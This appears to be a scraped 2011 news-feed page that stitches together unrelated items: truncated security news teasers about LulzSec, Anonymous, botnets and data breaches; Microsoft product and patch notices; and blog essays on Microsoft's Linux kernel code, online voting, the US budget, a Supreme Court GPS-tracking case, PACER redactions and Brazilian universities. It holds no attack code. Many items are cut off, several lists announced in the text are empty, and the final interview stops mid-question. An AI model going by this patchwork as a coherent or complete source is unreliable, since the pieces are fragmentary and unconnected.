Infamous pranktivist hackers LulzSec exploited basic security mistakes on a News International website to redirect users towards a fake story on the supposed death of media mogul Rupert Murdoch, it has emerged.…
Hackers breached the security of Rupert Murdoch's Sun website and briefly redirected many visitors to a hoax article falsely claiming the tabloid media tycoon had been found dead in his garden.…
Microsoft is offering a $250,000 reward for information leading to the arrest of those who controlled Rustock, a recently dismantled botnet that in its heyday was one of the biggest sources of illegal spam.…
Toshiba says that unidentified hackers have stolen customer records belonging to 7,500 of its customers.…
Almost half the security bugs chronicled by Secunia in the last year were not covered by a patch at the time of their publication.…
The United States may be forced to redesign an unnamed new weapon system now under development – because tech specs and plans were stolen from a defence contractor's databases.…
A Romanian accused of hacking NASA is fighting against an order to pay damages to the space agency.…
Truth is often stranger than fiction. Microsoft was the fifth-largest corporate contributor to the Linux kernel version 3.0.0, as measured by the number of changes to its previous release. Only Red Hat, Intel, Novell, and IBM had more contributions. Microsoft was #15 as measured by number of lines changed, which is smaller but is still an impressively large number.
This work by Microsoft was to clean up the “Microsoft Hyper-V (HV) driver” so that the Microsoft driver would be included in the mainline Linux kernel. Microsoft originally submitted this set of code changes back in July 2009, but there were a lot of problems with it, and the Linux kernel developers insisted that it be fixed. The Linux community had a long list of issues with Microsoft’s code, but the good news is that Microsoft worked to improve the quality of its code so that it could be accepted into the Linux kernel. Other developers helped Microsoft get their code up to par, too. ( Steve Friedl has some comments about its early technical issues.) There’s something rather amusing about watching Microsoft (a company that focuses on software development) being forced by the Linux community to improve the quality of Microsoft’s code. Anyone who thinks that FLOSS projects (which typically use widespread public peer review) always produce lower quality software than proprietary vendors just isn’t watching the real world (see my survey paper of quantitative FLOSS studies if you want more on that point). Peer review often exposes problems, so that they can be fixed, and that is what happened here.
Microsoft did not do this for the sheer thrill of it. Getting code into the mainline Linux kernel release, instead of just existing as a separate patch, is vitally important for an organization if they want people to use their software (if it needs to be part of the Linux kernel, as this did). A counter-example is that the Xen developers let KVM zoom ahead of them, because the Xen developers failed to set a high priority on getting full support for Xen into the mainline Linux kernel. As Thorsten Leemhuis at The H says, “There are many indications that the Xen developers should have put more effort into merging Xen support into the official kernel earlier. After all, while Xen was giving developers and distribution users a hard time with the old kernel, a new virtualisation star was rising on the open source horizon: KVM (Kernel-based Virtual Machine)… In the beginning, KVM could not touch the functional scope and speed of Xen. But soon, open source developers, Linux distributors, and companies such as AMD, Intel and IBM became interested in KVM and contributed a number of improvements, so that KVM quickly caught up and even moved past Xen in some respects.” Xen may do well in the future, but this is still a cautionary tale.
This doesn’t mean that Microsoft is suddenly releasing all its programs as free/libre/open source software (FLOSS). Far from it. It is obvious to me that Microsoft is contributing this code for the same reason many companies contribute to the Linux kernel and other FLOSS software projects: Money.
I think it is clear that Microsoft hopes that these changes to Linux will help Microsoft sell more Windows licenses. These changes enable Linux to run much better (e.g., more efficiently) on top of Microsoft Windows’ hypervisor (Hyper-V). Without them, people who want to run Linux on top of a hypervisor are much more likely to use products other than Microsoft’s. Microsoft doesn’t want to be at a competitive disadvantage in this market, so to sell its product, it chose to contribute changes to the Linux kernel. With this change, Microsoft Windows becomes a more viable option as a host operating system, running Linux as a guest.
Is this a big change? In some ways it is not. Microsoft has developed a number of FLOSS packages, such as WiX (for installing software on Windows), and it does all it can to encourage the development of FLOSS that run on Windows.
Still, it’s something of a change for Microsoft. Microsoft CEO Steve Ballmer stated in 2001 that Linux and the GNU GPL license were “a cancer”. This was in many ways an attack on FLOSS in general; the GNU GPL is the most popular FLOSS license by far, and a MITRE report found that the “GPL sufficiently dominates in DoD applications for a ban on GPL to closely approximate a full ban of all [FLOSS]”. This would have been disastrous for their customer, because MITRE found that FLOSS software “plays a far more critical role in the [Department of Defense] than has been generally recognized”. I think many other organizations would say the same. This is not even the first time Microsoft has gotten involved with the GPL. Microsoft sold Windows Services for Unix (SFU), which had GPL software, showing that even Microsoft understood that it was possible to make money while using the GPL license. But this more case is far more extreme; in this case Microsoft is actively helping a product (the Linux kernel) that it also competes with. I don’t expect Microsoft to keep contributing significantly to the Linux kernel, at least for a while, but that doesn’t matter; here we see that cash trumps ideology. More generally, this beautifully illustrates collaborative development: Anyone can choose to work on specific areas of a FLOSS program, for their own specific or selfish reasons, to co-produce works that help us all.
Updated Security researchers claim to have uncovered a serious security hole in Vodafone's mobile network.…
Six out of every 10 users of Adobe Reader are running vulnerable versions of the ubiquitous PDF reader package, according to stats from freebie anti-virus scanner firm Avast.…
Sega's forum remains offline almost a month after its forums and other sites were hit by hacktivists.…
Anonymous has latched onto yet another new target with the release of potentially sensitive data from controversial agricultural giant Monsanto.…
You can go to Windows Intune Springboard site for information on signing up for your beta subscription. Once you have completed the sign-up process and activated your account, you can go to https://beta.manage.microsoft.com to begin evaluating the beta. A beta subscription will allow you to deploy to up to 10 PCs, which should allow you to evaluate the improvements we’ve made.
Here are the highlights of what’s new:
Software Distribution
Better Hardware Reporting and Filters
Third Party License Management
User Interface Enhancements
Remote Actions
Improvements to Alerts Workspace
Support for images
Note: This latest update (14.0.6106.5001) includes several stability and reliability fixes and supports the HTTPS protocol for all communication between Microsoft Outlook and Windows Live Hotmail, Calendar and Contacts.
With Microsoft Outlook Hotmail Connector 32-bit, you can use Microsoft Office Outlook 2003, Microsoft Office Outlook 2007 or Microsoft Office Outlook 2010 to access and manage your Microsoft Windows Live Hotmail or Microsoft Office Live Mail accounts, including e-mail messages, contacts and calendars for free!
Outlook Hotmail Connector enables you to use your Live Hotmail accounts within Outlook:
| | |
|
The links in this section correspond to files available for this download. Download the files appropriate for you.
File Name | Size | |
---|---|---|
SQLManagementStudio_x64_ENU.exe | 155.0 MB | Download |
SQLManagementStudio_x86_ENU.exe | 153.0 MB | Download |
SQLServer2008R2SP1-KB2528583-IA64-ENU.exe | 296.0 MB | Download |
SQLServer2008R2SP1-KB2528583-x64-ENU.exe | 309.0 MB | Download |
SQLServer2008R2SP1-KB2528583-x86-ENU.exe | 201.0 MB | Download |
What’s New in SQL Server 2008 R2 Service Pack 1 ?
Anonymous uploaded 90,000 military email address and associated password hashes onto a file-sharing network on Monday as part of an operation it christening Military Meltdown Monday.…
Microsoft has disabled the search results on its Security Centre after malware-spreaders abused the function to promote shady pornographic websites serving Trojans as well as cheap thrills.…
A study of cybercrime economics shows that peddlers of rogue antivirus scams rely on legitimate banks to run their businesses, carefully ensuring that the volume of chargebacks they incur stay just on the right side of being flagged-up as obviously fraudulent.…
Portuguese hackers responded to a negative assessment of the country's ability to repay loans by defacing the website of credit reference agency Moody's.…
Microsoft is to issue four bulletins next Tuesday – one of which is critical – as part of the July edition of its Patch Tuesday update cycle.…
Chunlai Yang, a 49-year old Chinese-born American, has been charged with stealing proprietary software code.…
The latest jailbreak for iPhones, published on Wednesday, exploits a zero-day bug in iOS that only users of jailbroken devices will be able to fix, security experts warn.…
The zombie machines which formerly powered the infamous Rustock botnet are down to half their original number, according to Microsoft.…
One of the most common questions I get is “if I can bank online, why can’t I vote online”. A recently released (but undated) document ”Supplement to Authentication in an Internet Banking Environment” from the Federal Financial Institutions Examination Council addresses some of the risks of online banking. Krebs on Security has a nice writeup of the issues, noting that the guidelines call for 'layered security
programs' to deal with these riskier transactions, such as:
[I've replaced bullets with numbers in Krebs’ posting in the above list to make it
easier to reference below.]
So what does this have to do with voting? Well, if you look at them
in turn and consider how you'd apply them to a voting system:
Unsaid, but of course implied by the financial industry list is that the goal is to reduce fraud to a manageable level. I’ve heard that 1% to 2% of the online banking transactions are fraudulent, and at that level it’s clearly not putting banks out of business (judging by profit numbers). However, whether we can accept as high a level of fraud in voting as in banking is another question.
None of this is to criticize the financial industry’s efforts to improve security! Rather, it’s to point out that try as we might, just because we can bank online doesn’t mean we should vote online.
Exchange Team Blog: We're excited to announce that later this year we'll be adding a new tool to our already rich portfolio of planning and deployment tools. This new tool, PST Capture, will be downloadable and free, and will enable you to discover .pst files on your network and then import them into both Exchange Online (in Office 365) and Exchange Server 2010 on-premises. PST Capture will be available later this year. It doesn’t replace the New-MailboxImportRequest cmdlet that exists already for importing known .pst files into Exchange Server, but instead works in parallel to enable you to embark on a systematic search and destroy mission to rid yourself of the dreaded .pst scourge.
Coming Soon PST Capture Tool - Exchange Team Blog - Site Home - TechNet Blogs
A backdoor has been discovered in the source code of a widely used FTP package.…
(This is a blog entry for U.S. citizens — everyone else can ignore it.)
We Americans must demand that the U.S. government work to balance its budget over time. The U.S. government has a massive annual deficit, resulting in a massive national debt that is growing beyond all reasonable bounds. For example, in just Fiscal Year (FY) 2010, about $3.4 trillion was spent, but only $2.1 trillion was received; that means that the U.S. government spent more than a trillion dollars more than it received. Every year that the government spends more than it receives it adds to the gross federal debt, which is now more than $13.6 trillion.
This is unsustainable. The fact that this is unsustainable is certainly not news. The U.S. Financial Condition and Fiscal Future Briefing (GAO, 2008) says, bluntly, that the “Current Fiscal Policy Is Unsustainable”. “The Moment of Truth: Report of the National Commission on Fiscal Responsibility and Reform” similarly says “Our nation is on an unsustainable fiscal path”. Many others have said the same. But even though it’s not news, it needs to be yelled from the rooftops.
The fundamental problem is that too many Americans — aka “we the people” — have not (so far) been willing to face this unpleasant fact. Fareed Zakaria nicely put this in February 21, 2010: “ … in one sense, Washington is delivering to the American people exactly what they seem to want. In poll after poll, we find that the public is generally opposed to any new taxes, but we also discover that the public will immediately punish anyone who proposes spending cuts in any middle class program which are the ones where the money is in the federal budget. Now, there is only one way to square this circle short of magic, and that is to borrow money, and that is what we have done for decades now at the local, state and federal level … The lesson of the polls in the recent elections is that politicians will succeed if they pander to this public schizophrenia. So, the next time you accuse Washington of being irresponsible, save some of that blame for yourself and your friends”.
But Americans must face the fact that we must balance the budget. And we must face it now. We must balance the budget the same way families balance their budgets — the government must raise income (taxes), lower expenditures (government spending), or both. Growth over time will not fix the problem.
How we rellocate income and outgo so that they match needs to be a political process. Working out compromises is what the political process is supposed to be all about; nobody gets everything they want, but eventually some sort of rough set of priorities must be worked out for the resources available. Compromise is not a dirty word to describe the job of politics; it is the job. In reality, I think we will need to both raise revenue and decrease spending. I think we must raise taxes to some small degree, but we can’t raise taxes on the lower or middle class much; they don’t have the money. Also, we will not be able to solve this by taxing the rich out of the country. Which means that we must cut spending somehow. Just cutting defense spending won’t work; defense is only 20% of the entire budget. In contrast, the so-called entitlements — mainly medicare, medicaid, and social security — are 43% of the government costs and rapidly growing in cost. I think we are going to have to lower entitlement spending; that is undesirable, but we can’t keep providing services we can’t pay for. The alternative is to dramatically increase taxes to pay for them, and I do not think that will work. Raising the age before Social Security benefits can normally be received is to me an obvious baby step, but again, that alone will not solve the problem. It’s clearly possible to hammer out approaches to make this work, as long as the various camps are willing to work out a compromise.
To get there, we need to specify and plan out the maximum debt that the U.S. will incur in each year, decreasing that each year (say, over a 10-year period). Then Congress (and the President) will need to work out, each year, how to meet that requirement. It doesn’t need to be any of the plans that have been put forward so far; there are lots of ways to do this. But unless we agree that we must live within our means, we will not be able to make the decisions necessary to do so. The U.S. is not a Greece, at least not now, but we must make decisions soon to prevent bad results. I am posting this on Independence Day; Americans have been willing to undergo lots of suffering to gain control over their destinies, and I think they are still able to do so today.
In the short term (say a year), I suspect we will need to focus on short-term recovery rather than balancing the budget. And we must not default. But we must set the plans in motion to stop the runaway deficit, and get that budget balanced. The only way to get there is for the citizenry to demand it stop, before far worse things happen.
Microsoft Security Essentials 2.1
Doesn’t tell what’s new, but download it at the MSE site:
Virus, Spyware & Malware Protection Microsoft Security Essentials
One of the world's stealthiest pieces of malware infected more than 4.5 million PCs in just three months, making it possible for its authors to force keyloggers, adware, and other malicious programs on the compromised machines at any time.…
So I just installed office 2010 Service Pack 1 and when you look in the Help screen in backstage pane, it doesn’t show Service Pack 1 is installed, only the build number is higher.
Why does Microsoft do this, why make it hard for end users, administrators, support personnel to determine the Service Pack level. Now you need to puzzle with buildnumbers
Also my office seems activated twice??
UPDATE, thanks to commenters “just click on the "Additional Version and Copyright Information" and it will show the traditional Help --> About screen”
Office 2010 Service Pack 1 released today and it available for downloading from the following links:
Service Pack 1 for Microsoft Office 2010 (KB2460049) 64-bit Edition
Service Pack 1 for Microsoft Office 2010 (KB2460049) 32-bit Edition
http://support.microsoft.com/kb/2460049
Updated Microsoft is advising users to roll-back Windows if they happen to be unfortunate enough to get hit by a particularly vicious rootkit.…
Steve Ballmer will announce news detailing the latest on Office 365 on Tuesday, June 28, at 10 a.m. EDT / 7 a.m. PDT. Watch the webcast here.
…available in 40 markets. Introduced in beta last year, more than 200,000 organizations signed up and began testing it. Businesses testing Office 365 are already reporting impressive results, reducing IT costs by up to an estimated 50%, while boosting productivity.
Office 365 offers a wide range of service plans for a predictable monthly price from $2 to $27 per user per month. With Office 365 for small businesses, customers can be up and running with Office Web Apps, Microsoft Exchange Online, Microsoft SharePoint Online, Microsoft Lync Online and an external website in minutes, for $6 (U.S.) per user, per month. These tools put enterprise-grade email, shared documents, instant messaging, video and Web conferencing, portals and more at everyone’s fingertips.
Office 365 for enterprises has an array of choices, from simple email to comprehensive suites to meet the needs of midsize and large businesses, as well as government organizations. Customers can now get Microsoft Office Professional Plus on a pay-as-you-go basis with cloud-based versions of the industry’s leading business communications and collaborations services. Each of these plans come with the advanced IT controls, security, 24x7 IT support and reliability customers expect from Microsoft.
Today, more than 20 service providers around the globe also shared plans to bring Office 365 to their customers this year. Bell Canada, Intuit Inc., NTT Communications Corporation, Telefonica S.A., Telstra Corp. and Vodafone Ltd., among others, will package and sell Office 365 with their own services — from Web hosting and broadband to finance solutions and mobile services — and bring those new offerings to millions of small and midsize businesses globally.
Zombie movie star Simon Pegg was obliged to warn his followers after his Twitter feed was hacked to post links to malware.…
Microsoft will announce and release Office 2010 Service Pack 1 on Tuesday.
The software giant is readying the Office 2010 SP1 release alongside the general availability launch of Office 365. Microsoft had previously promised Office 2010 SP1 “by the end of June.” WinRumors understands, from sources familiar with Microsoft’s plans, that the SP1 download will be made available at 9AM PST on Tuesday June 28. SP1 releases for both Office client suites and SharePoint server products will be made available. All language versions of SP1 will release at the same time. Service Pack 1 will be offered as a manual download from the Download Center and from Microsoft Update.
Microsoft will include the following important fixes in SP1:
Microsoft plans to include the following security and non-security related fixes:
Office 2010 SP1 to be released this week WinRumors
This morning, the Supreme Court agreed to hear an appeal next term of United States v. Jones (formerly United States v. Maynard), a case in which the D.C. Circuit Court of Appeals suppressed evidence of a criminal defendant's travels around town, which the police collected using a tracking device they attached to his car. For more background on the case, consult the original opinion and Orin Kerr's previous discussions about the case.
No matter what the Court says or holds, this case will probably prove to be a landmark. Watch it closely.
(1) Even if the Court says nothing else, it will face the constitutionally of the use by police of tracking beepers to follow criminal suspects. In a pair of cases from the mid-1980's, the Court held that the police did not need a warrant to use a tracking beeper to follow a car around on public, city streets (Knotts) but did need a warrant to follow a beeper that was moved indoors (Karo) because it "reveal[ed] a critical fact about the interior of the premises." By direct application of these cases, the warrantless tracking in Jones seems constitutional, because it was restricted to movement on public, city streets.
Not so fast, said the D.C. Circuit. In Jones, the police tracked the vehicle 24 hours a day for four weeks. Citing the "mosaic theory often invoked by the Government in cases involving national security information," the Court held that the whole can sometimes be more than the parts. Tracking a car continuously for a month is constitutionally different in kind not just degree from tracking a car along a single trip. This is a new approach to the Fourth Amendment, one arguably at odds with opinions from other Courts of Appeal.
(2) This case gives the Court the opportunity to speak generally about the Fourth Amendment and location privacy. Depending on what it says, it may provide hints for lower courts struggling with the government's use of cell phone location information, for example.
(3) For support of its embrace of the mosaic theory, the D.C. Circuit cited a 1989 Supreme Court case, U.S. Department of Justice v. National Reporters Committee. In this case, which involved the Freedom of Information Act (FOIA) not the Fourth Amendment, the Court allowed the FBI to refuse to release compiled "rap sheets" about organized crime suspects, even though the rap sheets were compiled mostly from "public" information obtainable from courthouse records. In agreeing that the rap sheets nevertheless fell within a "personal privacy" exemption from FOIA, the Court embraced, for the first time, the idea that the whole may be worth more than the parts. The Court noted the difference "between scattered disclosure of the bits of information contained in a rap-sheet and revelation of the rap-sheet as a whole," and found a "vast difference between the public records that might be found after a diligent search of courthouse files, county archives, and local police stations throughout the country and a computerized summary located in a single clearinghouse of information." (FtT readers will see the parallels to the debates on this blog about PACER and RECAP.) In summary, it found that "practical obscurity" could amount to privacy.
Practical obscurity is an idea that hasn't gotten much traction in the Courts since National Reporters Committee. But it is an idea well-loved by many privacy scholars, including myself, for whom it helps explain their concerns about the privacy implications of data aggregation and mining of supposedly "public" data.
The Court, of course, may choose a narrow route for affirming or reversing the D.C. Circuit. But if it instead speaks broadly or categorically about the viability of practical obscurity as a legal theory, this case might set a standard that we will be debating for years to come.
Free security software outfit Avast reckons unprotected Windows desktops still offer its greatest potential area for growth, despite its huge existing Windows user-base of 130 million active users.…
Federal authorities say they have crippled a notorious botnet that penetrated some of the world's most sensitive organizations, thanks to an unprecedented take-down strategy that used a government-run server that communicated directly with infected PCs.…
A former college student has admitted taking part in a criminal scheme that used malware to steal and sell large databases of faculty and alumni, change grades, and siphon funds from other students' accounts.…
Earlier today the Exchange CXP team released Update Rollup 4 for Exchange Server 2010 SP1 to the Download Center.
This update contains a number of customer-reported and internally found issues since the release of RU1. See 'KB 2509910: Description of Update Rollup 4 for Exchange Server 2010 Service Pack 1' for more details. In particular we would like to specifically call out the following fixes which are included in this release:
Some of the above KnowledgeBase articles are not replicated/live at the time of writing this post. Please check back later in the day if you can't reach them.
Update Rollup 5 for Exchange Server 2010 Service Pack 1 is currently scheduled to release in August 2011.
Note for Exchange 2010 Customers using the Arabic and Hebrew language version: We introduced two new languages with the release of Service Pack 1, Arabic and Hebrew. At present we are working through the process of modifying our installers to incorporate these two languages. Customers running either of the two language versions affected are advised to download and install the English language version of the rollup which contains all of the same fixes.
Note for Forefront users: For those of you running Forefront Security for Exchange, be sure you perform these important steps from the command line in the Forefront directory before and after this rollup's installation process. Without these steps, Exchange services for Information Store and Transport will not start after you apply this update. Before installing the update, disable ForeFront by using this command: fscutility /disable. After installing the update, re-enable ForeFront by running fscutility /enable
WordPress is requiring all account holders on the WordPress.org website to change their passwords following the discovery that hackers contaminated it with malicious software.…
You know your virtual currency has hit the big leagues when criminals develop trojans that infect computers for the sole purpose of stealing it. Bitcoin, the open-source project launched two years ago, reached that turning point Thursday.…
The System Center Orchestrator 2012 Beta product provides the capability of automation of workflows (Runbooks) across other System Center and 3rd party products.
The System Center Orchestrator Beta product provides the capability of automation of workflows (Runbooks) across other System Center and 3rd party products. These runbooks are created in the Runbook Designer, deployed via the Deployment Manager and run and monitored locally or remotely via the Orchestrator Console.
Feature Bullet Summary:
Download details System Center Orchestrator 2012 Beta
Google has downplayed concerns that refinements to its search technology could leave surfers more exposed to search engine manipulation attacks.…
In my research on privacy problems in PACER, I spent a lot of time examining PACER documents. In addition to researching the problem of "bad" redactions, I was also interested in learning about the pattern of redactions generally. To this end, my software looked for two redaction styles. One is the "black rectangle" redaction method I described in my previous post. This method sometimes fails, but most of these redactions were done successfully. The more common method (around two-thirds of all redactions) involves replacing sensitive information with strings of XXs.
Out of the 1.8 million documents it scanned, my software identified around 11,000 documents that appeared to have redactions. Many of them could be classified automatically (for example "123-45-xxxx" is clearly a redacted Social Security number, and "Exxon" is a false positive) but I examined several thousand by hand.
Here is the distribution of the redacted documents I found.
Type of Sensitive Information | No. of Documents |
---|---|
Social Security number | 4315 |
Bank or other account number | 675 |
Address | 449 |
Trade secret | 419 |
Date of birth | 290 |
Unique identifier other than SSN | 216 |
Name of person | 129 |
Phone, email, IP address | 60 |
National security related | 26 |
Health information | 24 |
Miscellaneous | 68 |
Total | 6208 |
To reiterate the point I made in my last post, I didn't have access to a random sample of the PACER corpus, so we should be cautious about drawing any precise conclusions about the distribution of redacted information in the entire PACER corpus.
Still, I think we can draw some interesting conclusions from these statistics. It's reasonable to assume that the distribution of redacted sensitive information is similar to the distribution of sensitive information in general. That is, assuming that parties who redact documents do a decent job, this list gives us a (very rough) idea of what kinds of sensitive information can be found in PACER documents.
The most obvious lesson from these statistics is that Social Security numbers are by far the most common type of redacted information in PACER. This is good news, since it's relatively easy to build software to automatically detect and redact Social Security numbers.
Another interesting case is the "address" category. Almost all of the redacted items in this category—393 out of 449—appear in the District of Columbia District. Many of the documents relate to search warrants and police reports, often in connection with drug cases. I don't know if the high rate of redaction reflects the different mix of cases in the DC District, or an idiosyncratic redaction policy voluntarily pursued by the courts and/or the DC police but not by officials in other districts. It's worth noting that the redaction of addresses doesn't appear to be required by the federal redaction rules.
Finally, there's the category of "trade secrets," which is a catch-all term I used for documents whose redactions appear to be confidential business information. Private businesses may have a strong interest in keeping this information confidential, but the public interest in such secrecy here is less clear.
To summarize, out of 6208 redacted documents, there are 4315 Social Security that can be redacted automatically by machine, 449 addresses whose redaction doesn't seem to be required by the rules of procedure, and 419 "trade secrets" whose release will typically only harm the party who fails to redact it.
That leaves around 1000 documents that would expose risky confidential information if not properly redacted, or about 0.05 percent of the 1.8 million documents I started with. A thousand documents is worth taking seriously (especially given that there are likely to be tens of thousands in the full PACER corpus). The courts should take additional steps to monitor compliance with the redaction rules and sanction parties who fail to comply with them, and they should explore techniques to automate the detection of redaction failures in these categories.
But at the same time, a sense of perspective is important. This tiny fraction of PACER documents with confidential information in them is a cause for concern, but it probably isn't a good reason to limit public access to the roughly 99.9 percent of documents that contain no sensitive information and may be of significant benefit to the public.
Thanks again to Carl Malamud and Public.Resource.Org for their support of my research.
Adobe has rolled out updates for its widely used Reader PDF viewer and Flash animation programs that fix flaws, some that hackers have been exploiting to hijack end user computers.…
When Brazilian president Dilma Roussef visited China in the beginning of May, she came back with some good news (maybe too good to be entirely true). Among them, the announcement that Foxconn, the largest maker of electronic components, will invest US$12 billion to open a large industrial plant in the country. The goal is to produce iPads and other key electronic components locally.
The announcement was praised, and made it quickly to the headlines of all major newspapers. There is certainly reason for excitement. Brazil lost important waves of economic development, including industrialization (which only really happened in the 1940´s), or the semiconductor wave, an industry that has shown but a few signs of development in the country until now. (continue reading)
The president´s news also included the announcement that Foxconn would hire 100 thousand employees for the new plant, being 20% of them engineers. The numbers raised skepticism, for various reasons. Not only they seem exaggerated, but Brazil simply does not have 20,000 engineers available for hire. In 2008, the number of engineers in the country was 750,000 and the projection is that if growth rates continue at the same level, a deficit deficit in engineers is expected for the next years.
The situation increases the pressure over universities to train engineers and also to cope with the demands of development and innovation. This is a complex debate, but it is worth focusing on one aspect of the Brazilian university system: its isolation from the rest of the world. In short, Brazilian universities, both in terms of students and faculty, are almost entirely made of Brazilians. As an example, at the University of Sao Paulo (USP), the largest and most important university in the country, only 2,8% of a total 56,000 students are international international. In most other universities the number of international students tend to be even smaller. Regarding faculty, the situation is not different. There have been a few recent efforts by some institutions (mostly private) to increase the number of international professors. But there is still a long way to go.
The low degree of internationalization is already causing problems. For instance, it makes it difficult for Brazilian universities to score well on world ranks. By way of example, no Brazilian university has ever been included in the top 200 universities of the Times Higher Education World Ranking, a ranking that pays especial attention to internationalization efforts.
Even if rankings might not be the main issue, the fact that the university system is essentially inward-looking indeed creates problems, making it harder for innovation. For instance, many of Foxconn's new plant engineers might end up being hired abroad. If some sort of integration is not established with Brazilian universities, that will consist of a missed opportunity for transferring technology or developing local capacity.
The challenges of integrating such a large operation with universities are huge. Even for small scale cooperation, it turns out that the majority of universities in Brazil are unprepared to deal with international visitors, either students or faculty. For an international professor to be formally hired by a local university, she will have in most cases have to validate her degree in Brazil. The validation process can be Kafkian, requiring lots o paperwork (including "sworn translations") and time, often months or years. This poses a challenge not only for professors seeking to teach in Brazil, but also to Brazilian who obtained a degree abroad and return home. Local boards of education do not recognize international degrees, regardless if they have been awarded by Princeton or the Free University of Berlin. Students return home formally with the same academic credentials they had before obtaining a degree abroad. The market often recognize the value of the international degrees, but the the university system does not.
The challenges are visible also at the very practical level. Most of universities do not have an office in charge of foreign admissions or international faculty or students. Many professors who venture into the Brazilian university system will go through the process without formal support, counting on the efforts and enthusiasm of local peer professors who undertake the work of dealing with the details of the visit (obtaining a Visa, work permit, or the long bureaucratic steps to get the visitor’s salary actually being paid).
The lack of internationalization is bad innovation. As pointed out by Princeton’s computer science professor Kai Li during a recent conference on technology cooperation between the US and China organized by the Center for Information Technology Policy, the presence of international students and faculty in US universities has been crucial for innovation. Kai emphasizes the importance of maintaining an ecosystem for innovation, which not only attracts the best students to local universities, but help retain them after graduation. Many will work on research, create start-ups or get jobs in the tech industry. The same point was made recently by Lawrence Lessig at his recent G8 talk in France, where he claimed that a great deal of innovation in the US was made by “outsiders”.
Another important aspect of the lack of internationalization in Brazil is the lack of institutional support. Government funding organizations, such as CAPES, CNPQ, Fapesp and others, play an important role. But Brazil still lacks both public and private institutions aimed specifically at promoting integration, Brazilian culture and international exchange (along the lines of Fulbright, the Humboldt Foundation, or institutes like Cervantes, Goethe or the British Council).
As mentioned by Volker Grassmuck, a German media studies professor who spent 18 months as a researcher at the University of Sao Paulo: “The Brazilian funding institutions do have grants for visiting researchers, but the application has to be sent locally by the institution. In the end of my year in Sao Paulo I applied to FAPESP, the research funding age of the Sao Paulo state, but it did not work out, since my research group did not have a research project formalized there”.
He compares the situation with German universities, saying that “when I started teaching at Paderborn University which is a young (funded in 1972) mid-sized (15.000 students) university in a small town, the first time I walked across campus, I heard Indian, Vietnamese, Chinese, Arabic, Turkish and Spanish. At USP during the entire year I never heard anything but Portuguese”. (see Volker's full interview below)
Of course any internationalization process at this point has to be very well planned. In Brazil, 25% of the universities are public and 75% private. There is still a huge deficit of places for local students, even with the university population growing quite fast in the past 6 years. In 2004 Brazil had 4,1 milllion university students. In 2010, the number reached 6,5 million. However, only 20% of young students in Brazil find a place at the university system, different from the 43% in Chile or 61% in Argentina. The country still struggles to provide access to its own students at universities. But at the same time, the effort of internationalization should not be understood as competing with expanding access. The challenge for Brazil is actually to do both things at the same time: expanding access to local students, and promoting internationalization. If Brazil wants to play a role as an important emerging economy, that´s the way to go (no one said it would be easy!). One thing should not exclude the other.
In this sense, João Victor Issler, an economics professor at EPGE (the Graduate School of Economics at Fundação Getulio Vargas), has a pragmatic view about the issue. He says: “inasmuch as Brazil develops economically, it will inexorably increase the openness of the university system. I am not saying that there should not be specific initiatives to increase internationalization, but an isolated process will be limited. More important than the internationalization of students and faculty is opening the economy to commerce and finance, a process that will directly affect long-term economic development and all its variables: education, innovation and the work force”. João Victor´s point is important. If internationalization follows development, there is already some catch up to do. The country has developed significantly in the past 16 years, but that has not corresponded to any significant improvement in the internationalization of universities.
A few strategies might help achieving more openness on the part of Brazilian universities, without necessarily competing with the goal of expanding access to local students. One of them is the use ICT´s for international collaboration. Another is providing support to what is already working. But there is more that could be done to improve internationalization. Here is a short list:
a) Development organizations such as the World Bank or the Interamerican Development Bank (IDB) can play an important role. Once the internationalization goal is defined, they could provide the necessary support, in partnership with local institutions.
b) Pay attention to the basics: creating specific departments to centralize support for international students and faculty. They should be responsible for the strategy, but also help with practical matters, such as Visa, travel, and coping with the local bureaucracy.
c) The majority of Brazilian universities´ websites are only in Portuguese. Even the webpage of the International Cooperation Commission at the University of Sao Paulo is mostly in Portuguese, and many of the English links are broken.
d) Increase the use of Information and Communication Technologies (ICT´s) as a tool for cooperation and for integrating students and faculty with international projects. Increasing distance learning programs and cooperation mediated by ICT´s is a no-brainer.
e) Create a prize system for internationalization projects, to be awarded every few years to the educational institution that best advanced that goal.
f) Consider a policy-effective tax break to the private sector (which might include private universities), in exchange for developing successful research centers that include an international component.
g) Brazilian organizations funding research should seek to increase support to international researchers and professors who would like to develop projects in Brazil.
h) Regional integration is the low-hanging fruit. Attracting the best students from other Latin American countries is an opportunity to kickstart international cooperation
i) Map what is already in place, identifying what is working in terms of internationalization and supporting its expansion.
j) Brazil needs an innovation research lab. Large investment packages, such as the government support to Foxconn´s new plant should include integration with universities and the creation of a public/private research center, focused on innovation.
Below are the the complete interviews with Volker Grassmuck and João Victor Issler, with their perspectives on the issue.
Interview with Volker Grassmuck
Volker is currently a lecturer at Paderborn University. He spent 18 months in Brazil as a visiting researcher affiliated with the University of Sao Paulo. His visit contributed significantly to the Brazilian copyright reform debate. He partnered with local researchers and law professors (as well as artists and NGO’s) to develop an innovative compensation system for artists, which has become part of the copyright reform debate.
1) How do you think the Brazilian Universities are prepared to receive students and professors/researchers from abroad?
I did not experience any special provisions for foreigners at USP. The inviting professor has to navigate university bureaucracy for the visiting researcher just as for any Brazilian researcher. I did experience a number of bizarre situations, but these were not specific to me, but the same for all in our research group.
E.g.: In order to receive my grant I was forced to open an account with the only bank that has an office on the USP Leste campus. The money from Ford Foundation was already there, and it was exactly the same amount that was supposed to be made over to my account at the same day of the month. But every single month had to remind the person in our group in charge of administrative issues that the money had not arrived. She would then go to the university administration to pick up a check that physically had to be carried to the bank to deposit it there. If the single person in the administration in charge was ill this would be delayed until that person came back.
Another path a foreigner can pursue is to apply for a professorship at a Brazilian university. I looked into this while I was there and got advice from a few people who had actually done this. Prerequisite would be a “revalidating” my German Ph.D. This is a long procedure, requiring originals and copies of diploma, grades etc. authenticated by the Brazilian Consulate, a copy of the dissertation, maybe even a translation into Portuguese, an examination similar to the original Ph.D. examination plus some extras (e.g. “didactics”) that you don’t have at a German university and a fee, in the case of USP, of R$ 1,530.00. In other words, Brazilian academy does not trust Free University of Berlin to issue valid Ph.Ds and requires me to essentially go through the whole Ph.D. procedure all over again. And then I would be able to take a “public competition”, which is yet another procedure unlike anything required by a German university.
2) What is the situation in the German universities? Are they prepared and/or do receive foreign students and professors/researcher?
